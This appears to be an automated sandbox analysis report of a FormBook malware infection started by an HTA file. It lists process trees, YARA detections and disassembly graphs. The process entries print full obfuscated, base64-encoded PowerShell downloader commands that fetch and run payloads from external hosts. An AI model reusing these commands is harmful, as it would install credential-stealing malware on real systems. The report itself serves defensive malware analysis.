                                                            2024-12-02 08:18:14 UTC8192INData Raw: 3c 50 03 a0 15 58 8c d2 a3 93 22 a8 5d c5 95 94 5f 03 76 e0 4f f2 ff 00 87 3a 10 95 24 93 ac 85 59 58 23 21 00 06 1c 8e 3d ac 8f cf 15 77 2e cc cc 6c 93 66 85 5e 05 c6 dd a4 ee 50 2d 7d fd 8e 18 6a 21 54 e0 7f 19 3b 41 20 d5 11 d7 eb 89 76 eb 91 58 0d 3c 81 82 aa 05 04 6e e9 7d 08 f8 e1 a0 96 34 68 dc 95 b0 56 e8 10 78 20 f2 3a 11 43 b7 38 87 d7 0b 02 87 99 11 88 00 b0 04 93 54 30 1d d4 4f 13 ce cc 0a 12 5c 37 01 8d ed be 0d fb fc 30 0d 2a f9 d1 48 68 81 b4 ba 8b ea 38 3f 98 17 f5 c0 48 8c 8c ca c2 98 1a 3c df c7 05 58 1a 49 3c 40 20 b5 4a 0e 4e c0 c7 aa d0 06 fb df d3 20 48 8f 13 2f 99 c2 c5 44 80 7a 97 07 8b e7 11 50 b7 c9 20 51 e9 90 7a 57 eb 80 db ca ad 1b ad d9 2c 9d 01 e4 05 20 9f ce b0 53 32 bd b2 b5 92 ec 7e 9c 56 2f 59 74 0c cc 15 41 26 fa 60 3b
                                                            Data Ascii: <PX"]_vO:$YX#!=w.lf^P-}j!T;A vX<n}4hVx :C8T0O\70*Hh8?H<XI<@ JN H/DzP QzW, S2~V/YtA&`;


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:03:18:00
                                                            Start date:02/12/2024
                                                            Path:C:\Windows\SysWOW64\mshta.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:mshta.exe "C:\Users\user\Desktop\seemebestgoodluckthings.hta"
                                                            Imagebase:0x250000
                                                            File size:13'312 bytes
                                                            MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:1
                                                            Start time:03:18:01
                                                            Start date:02/12/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\system32\cmd.exe" "/c pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"
                                                            Imagebase:0x240000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:2
                                                            Start time:03:18:01
                                                            Start date:02/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:3
                                                            Start time:03:18:01
                                                            Start date:02/12/2024
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"
                                                            Imagebase:0xf90000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:4
                                                            Start time:03:18:04
                                                            Start date:02/12/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.cmdline"
                                                            Imagebase:0x7b0000
                                                            File size:2'141'552 bytes
                                                            MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:5
                                                            Start time:03:18:04
                                                            Start date:02/12/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6914.tmp" "c:\Users\user\AppData\Local\Temp\pdppuoci\CSCAD4A7145578C4D2F8E5E86198ABD60D6.TMP"
                                                            Imagebase:0x7ff7699e0000
                                                            File size:46'832 bytes
                                                            MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:6
                                                            Start time:03:18:09
                                                            Start date:02/12/2024
                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS"
                                                            Imagebase:0x810000
                                                            File size:147'456 bytes
                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:7
                                                            Start time:03:18:10
                                                            Start date:02/12/2024
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = 'JGVzdHJlbGVqYXIgPSAnaHR0cHM6Ly8xMDE2LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1IVFVHX0V5cnVEUjBPQVpIMEhISnllcFVyWFN2Rl9pNmo4YndlVGVXQkN1MTl4Y2JqUU41VGtzYTRPRzBNcWNjcVdOTGxnJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjc5NDM1NmExZmY2YyAnOyRhbWJpZ3VpZGFkZSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGVudHJhZGFuaGEgPSAkYW1iaWd1aWRhZGUuRG93bmxvYWREYXRhKCRlc3RyZWxlamFyKTskYm9ybmVjbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRlbnRyYWRhbmhhKTskbGlxdWlkaWZpY2FyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRwaW50b3JhID0gJzw8QkFTRTY0X0VORD4+JzskY2hvdXZpciA9ICRib3JuZWNvLkluZGV4T2YoJGxpcXVpZGlmaWNhcik7JGltbWVyZ2lyID0gJGJvcm5lY28uSW5kZXhPZigkcGludG9yYSk7JGNob3V2aXIgLWdlIDAgLWFuZCAkaW1tZXJnaXIgLWd0ICRjaG91dmlyOyRjaG91dmlyICs9ICRsaXF1aWRpZmljYXIuTGVuZ3RoOyRmcnV0aWZpY2FyID0gJGltbWVyZ2lyIC0gJGNob3V2aXI7JGJ1c3NvbGNvID0gJGJvcm5lY28uU3Vic3RyaW5nKCRjaG91dmlyLCAkZnJ1dGlmaWNhcik7JHF1aW5pY2EgPSAtam9pbiAoJGJ1c3NvbGNvLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRidXNzb2xjby5MZW5ndGgpXTskYmVpcmFtZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHF1aW5pY2EpOyRzYWlkb3IgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRiZWlyYW1lKTskZW5nb3JkdXJhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlbmdvcmR1cmFyLkludm9rZSgkbnVsbCwgQCgndHh0LkFSRU5MRVQvMTYzLzIxLjMyMS41NDIuMjcxLy86cHR0aCcsICckZGFkYW5lJywgJyRkYWRhbmUnLCAnJGRhZGFuZScsICdhc3BuZXRfY29tcGlsZXInLCAnJGRhZGFuZScsICckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCcxJywnJGRhZGFuZScpKTs=';$morfose = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($alastrar));Invoke-Expression $morfose
                                                            Imagebase:0xf90000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:8
                                                            Start time:03:18:10
                                                            Start date:02/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:12
                                                            Start time:03:18:34
                                                            Start date:02/12/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                            Imagebase:0xfa0000
                                                            File size:56'368 bytes
                                                            MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2070222307.0000000001940000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2070222307.0000000001940000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2068186230.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2068186230.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Executed Functions

                                                              Function 066E0FE7 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.1703170021.00000000066E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_66e0000_mshta.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                              • Instruction ID: 5c66d6001a52e76a3e0ba55931fd1c4df277939e826c9e274b1856515548475a
                                                              • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                              • Instruction Fuzzy Hash:
                                                              Function 066E0FDF Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.1703170021.00000000066E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_66e0000_mshta.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                              • Instruction ID: 5c66d6001a52e76a3e0ba55931fd1c4df277939e826c9e274b1856515548475a
                                                              • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                              • Instruction Fuzzy Hash:
                                                              Function 066E0FD7 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.1703170021.00000000066E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_66e0000_mshta.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                              • Instruction ID: 5c66d6001a52e76a3e0ba55931fd1c4df277939e826c9e274b1856515548475a
                                                              • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                              • Instruction Fuzzy Hash:

                                                              Execution Graph

                                                              Execution Coverage:4.7%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:113
                                                              Total number of Limit Nodes:9
                                                              execution_graph 15618 c97579 15619 c9757f 15618->15619 15621 c975fe 15618->15621 15619->15621 15633 c979f7 15619->15633 15641 c97c45 15619->15641 15648 c97c71 15619->15648 15655 c97c81 15619->15655 15662 c97cc1 15619->15662 15669 c97b71 15619->15669 15677 c97ba1 15619->15677 15684 c97b81 15619->15684 15691 c97af1 15619->15691 15699 c97da8 15619->15699 15706 c97a18 15619->15706 15620 c975df 15621->15621 15637 c97a18 15633->15637 15634 c97b30 15634->15620 15636 c97ea8 15636->15620 15637->15634 15638 c97d57 URLDownloadToFileW 15637->15638 15714 73d45f4 15637->15714 15732 73d4610 15637->15732 15638->15636 15644 c97b9a 15641->15644 15643 c97ea8 15643->15620 15645 c97d57 URLDownloadToFileW 15644->15645 15646 73d45f4 13 API calls 15644->15646 15647 73d4610 13 API calls 15644->15647 15645->15643 15646->15645 15647->15645 15649 c97c7b 15648->15649 15653 73d45f4 13 API calls 15649->15653 15654 73d4610 13 API calls 15649->15654 15650 c97d57 URLDownloadToFileW 15652 c97ea8 15650->15652 15652->15620 15653->15650 15654->15650 15656 c97c9a 15655->15656 15660 73d45f4 13 API calls 15656->15660 15661 73d4610 13 API calls 15656->15661 15657 c97d57 URLDownloadToFileW 15659 c97ea8 15657->15659 15659->15620 15660->15657 15661->15657 15663 c97cd7 15662->15663 15667 73d45f4 13 API calls 15663->15667 15668 73d4610 13 API calls 15663->15668 15664 c97d57 URLDownloadToFileW 15666 c97ea8 15664->15666 15666->15620 15667->15664 15668->15664 15673 c97ae0 15669->15673 15670 c97b30 15670->15620 15672 c97ea8 15672->15620 15673->15670 15674 c97d57 URLDownloadToFileW 15673->15674 15675 73d45f4 13 API calls 15673->15675 15676 73d4610 13 API calls 15673->15676 15674->15672 15675->15674 15676->15674 15678 c97bbe 15677->15678 15682 73d45f4 13 API calls 15678->15682 15683 73d4610 13 API calls 15678->15683 15679 c97d57 URLDownloadToFileW 15681 c97ea8 15679->15681 15681->15620 15682->15679 15683->15679 15688 c97b9a 15684->15688 15685 c97d57 URLDownloadToFileW 15687 c97ea8 15685->15687 15687->15620 15688->15685 15689 73d45f4 13 API calls 15688->15689 15690 73d4610 13 API calls 15688->15690 15689->15685 15690->15685 15695 c97ae0 15691->15695 15692 c97b30 15692->15620 15694 c97ea8 15694->15620 15695->15692 15696 c97d57 URLDownloadToFileW 15695->15696 15697 73d45f4 13 API calls 15695->15697 15698 73d4610 13 API calls 15695->15698 15696->15694 15697->15696 15698->15696 15700 c97cf9 15699->15700 15704 73d45f4 13 API calls 15700->15704 15705 73d4610 13 API calls 15700->15705 15701 c97d57 URLDownloadToFileW 15703 c97ea8 15701->15703 15703->15620 15704->15701 15705->15701 15710 c97a4c 15706->15710 15707 c97b30 15707->15620 15709 c97ea8 15709->15620 15710->15707 15711 c97d57 URLDownloadToFileW 15710->15711 15712 73d45f4 13 API calls 15710->15712 15713 73d4610 13 API calls 15710->15713 15711->15709 15712->15711 15713->15711 15716 73d4610 15714->15716 15715 73d4a93 15715->15638 15716->15715 15720 c97da8 14 API calls 15716->15720 15721 c97b81 14 API calls 15716->15721 15722 c97ba1 14 API calls 15716->15722 15723 c97cc1 14 API calls 15716->15723 15724 c97c81 14 API calls 15716->15724 15725 c97c45 14 API calls 15716->15725 15726 c97a18 14 API calls 15716->15726 15728 c97af1 14 API calls 15716->15728 15729 c97b71 14 API calls 15716->15729 15730 c97c71 14 API calls 15716->15730 15731 c979f7 14 API calls 15716->15731 15750 c97e89 URLDownloadToFileW 15716->15750 15752 c91bf8 15716->15752 15756 c97e69 15716->15756 15717 73d4a34 15717->15638 15720->15717 15721->15717 15722->15717 15723->15717 15724->15717 15725->15717 15726->15717 15728->15717 15729->15717 15730->15717 15731->15717 15733 73d4a93 15732->15733 15734 73d4641 15732->15734 15733->15638 15734->15733 15736 c97e89 URLDownloadToFileW 15734->15736 15737 c97e69 URLDownloadToFileW 15734->15737 15738 c97da8 14 API calls 15734->15738 15739 c97b81 14 API calls 15734->15739 15740 c97ba1 14 API calls 15734->15740 15741 c97cc1 14 API calls 15734->15741 15742 c97c81 14 API calls 15734->15742 15743 c97c45 14 API calls 15734->15743 15744 c97a18 14 API calls 15734->15744 15745 c91bf8 URLDownloadToFileW 15734->15745 15746 c97af1 14 API calls 15734->15746 15747 c97b71 14 API calls 15734->15747 15748 c97c71 14 API calls 15734->15748 15749 c979f7 14 API calls 15734->15749 15735 73d4a34 15735->15638 15736->15735 15737->15735 15738->15735 15739->15735 15740->15735 15741->15735 15742->15735 15743->15735 15744->15735 15745->15735 15746->15735 15747->15735 15748->15735 15749->15735 15751 c97ea8 15750->15751 15751->15717 15753 c97e00 URLDownloadToFileW 15752->15753 15755 c97ea8 15753->15755 15755->15717 15757 c97e6f URLDownloadToFileW 15756->15757 15759 c97ea8 15757->15759 15759->15717

                                                              Executed Functions

                                                              Function 00C97A18 Relevance: 1.8, APIs: 1, Instructions: 317COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 343 c97a18-c97a4a 344 c97a4c-c97a53 343->344 345 c97a90 343->345 347 c97a55-c97a62 344->347 348 c97a64 344->348 346 c97a93-c97acf 345->346 357 c97b58-c97b63 346->357 358 c97ad5-c97ade 346->358 349 c97a66-c97a68 347->349 348->349 351 c97a6a-c97a6d 349->351 352 c97a6f-c97a71 349->352 354 c97a8e 351->354 355 c97a73-c97a80 352->355 356 c97a82 352->356 354->346 361 c97a84-c97a86 355->361 356->361 359 c97b72-c97b94 357->359 360 c97b65-c97b68 357->360 358->357 362 c97ae0-c97ae6 358->362 371 c97b9a-c97ba3 359->371 372 c97c5e-c97d52 359->372 360->359 361->354 364 c97de8-c97e52 362->364 365 c97aec-c97af9 362->365 381 c97e5d-c97e63 364->381 382 c97e54-c97e5a 364->382 366 c97afb-c97b2e 365->366 367 c97b4f-c97b56 365->367 383 c97b4b 366->383 384 c97b30-c97b33 366->384 367->357 367->362 371->364 374 c97ba9-c97bbe 371->374 413 c97d55 call 73d45f4 372->413 414 c97d55 call 73d4610 372->414 374->372 385 c97e71-c97ea6 URLDownloadToFileW 381->385 386 c97e65-c97e6e 381->386 382->381 383->367 388 c97b3f-c97b48 384->388 389 c97b35-c97b38 384->389 392 c97ea8-c97eae 385->392 393 c97eaf-c97ec3 385->393 386->385 389->388 392->393 407 c97d57-c97d60 408 c97d7a-c97d8d 407->408 409 c97d62-c97d78 407->409 410 c97d8f-c97d96 408->410 409->410 411 c97d98-c97d9e 410->411 412 c97da5 410->412 411->412 412->364 413->407 414->407
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.1813554454.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_c90000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2ac9f45d9b811bef9319f4ec107a5f8c5e115fd2b13354f9020b287f0b66d234
                                                              • Instruction ID: da8a5cfe37977e85124986881bd24089f1bb231bc40af7cd16cee4dcf6c0ba64
                                                              • Opcode Fuzzy Hash: 2ac9f45d9b811bef9319f4ec107a5f8c5e115fd2b13354f9020b287f0b66d234
                                                              • Instruction Fuzzy Hash: BCD1F975A15219AFCF05DF98D884A9EFBF2FF48310F248159E818AB351C771AD81CB90
                                                              Function 073D1F40 Relevance: 5.6, Strings: 4, Instructions: 568COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 73d1f40-73d1f65 1 73d2158-73d21a2 0->1 2 73d1f6b-73d1f70 0->2 10 73d21a8-73d21ad 1->10 11 73d2326-73d236a 1->11 3 73d1f88-73d1f8c 2->3 4 73d1f72-73d1f78 2->4 8 73d2108-73d2112 3->8 9 73d1f92-73d1f94 3->9 6 73d1f7c-73d1f86 4->6 7 73d1f7a 4->7 6->3 7->3 12 73d2114-73d211d 8->12 13 73d2120-73d2126 8->13 14 73d1fa4 9->14 15 73d1f96-73d1fa2 9->15 16 73d21af-73d21b5 10->16 17 73d21c5-73d21c9 10->17 29 73d2480-73d24b5 11->29 30 73d2370-73d2375 11->30 18 73d212c-73d2138 13->18 19 73d2128-73d212a 13->19 20 73d1fa6-73d1fa8 14->20 15->20 23 73d21b9-73d21c3 16->23 24 73d21b7 16->24 25 73d21cf-73d21d1 17->25 26 73d22d8-73d22e2 17->26 27 73d213a-73d2155 18->27 19->27 20->8 28 73d1fae-73d1fcd 20->28 23->17 24->17 33 73d21e1 25->33 34 73d21d3-73d21df 25->34 31 73d22ef-73d22f5 26->31 32 73d22e4-73d22ec 26->32 65 73d1fdd 28->65 66 73d1fcf-73d1fdb 28->66 54 73d24b7-73d24d9 29->54 55 73d24e3-73d24ed 29->55 36 73d238d-73d2391 30->36 37 73d2377-73d237d 30->37 39 73d22fb-73d2307 31->39 40 73d22f7-73d22f9 31->40 41 73d21e3-73d21e5 33->41 34->41 48 73d2397-73d2399 36->48 49 73d2432-73d243c 36->49 44 73d237f 37->44 45 73d2381-73d238b 37->45 46 73d2309-73d2323 39->46 40->46 41->26 47 73d21eb-73d220a 41->47 44->36 45->36 90 73d220c-73d2218 47->90 91 73d221a 47->91 52 73d23a9 48->52 53 73d239b-73d23a7 48->53 57 73d243e-73d2446 49->57 58 73d2449-73d244f 49->58 64 73d23ab-73d23ad 52->64 53->64 98 73d252d-73d2556 54->98 99 73d24db-73d24e0 54->99 60 73d24ef-73d24f4 55->60 61 73d24f7-73d24fd 55->61 68 73d2455-73d2461 58->68 69 73d2451-73d2453 58->69 71 73d24ff-73d2501 61->71 72 73d2503-73d250f 61->72 64->49 75 73d23b3-73d23b5 64->75 74 73d1fdf-73d1fe1 65->74 66->74 70 73d2463-73d247d 68->70 69->70 77 73d2511-73d252a 71->77 72->77 74->8 79 73d1fe7-73d1fee 74->79 80 73d23cf-73d23d6 75->80 81 73d23b7-73d23bd 75->81 79->1 92 73d1ff4-73d1ff9 79->92 86 73d23ee-73d242f 80->86 87 73d23d8-73d23de 80->87 83 73d23bf 81->83 84 73d23c1-73d23cd 81->84 83->80 84->80 96 73d23e0 87->96 97 73d23e2-73d23ec 87->97 95 73d221c-73d221e 90->95 91->95 93 73d1ffb-73d2001 92->93 94 